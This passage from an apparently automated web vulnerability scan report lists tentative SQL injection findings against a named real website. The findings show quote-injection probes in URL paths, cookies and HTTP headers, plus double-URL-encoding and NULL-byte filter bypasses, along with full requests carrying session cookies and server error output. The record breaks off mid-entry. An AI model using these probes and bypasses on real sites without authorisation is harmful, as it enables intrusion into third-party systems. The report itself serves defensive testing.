<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.129. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/97-workshop-january-29th-dimensionator.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/97-workshop-january-29th-dimensionator.html' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 01:59:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/97-workshop-january-29th-dimensionator.html'' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 01:59:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:59:14 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 01:59:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21528


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.130. http://www.analyticspros.com/blog/seo.feed [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo.feed

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.feed?type=atom
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.feed?type=atom
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:26:55 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:26:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.131. http://www.analyticspros.com/blog/seo.feed [fpssCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo.feed

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo.feed?type=rss HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo.feed?type=rss HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:22:59 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:22:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.132. http://www.analyticspros.com/blog/seo.feed [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo.feed

Issue detail

The type parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the type parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the type request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/seo.feed?type=rss%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:20:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo.feed?type=rss%2527%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:20:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:20:39 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:20:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.133. http://www.analyticspros.com/blog/seo.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/seo.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:44:52 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527%2527
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:44:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.134. http://www.analyticspros.com/blog/seo/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:25:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:25:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:25:59 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:25:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.135. http://www.analyticspros.com/blog/seo/ [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:14:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:15:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.136. http://www.analyticspros.com/blog/seo/ [fpssCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:12:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:12:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.137. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html [User-Agent HTTP header]  previous  next

Summary

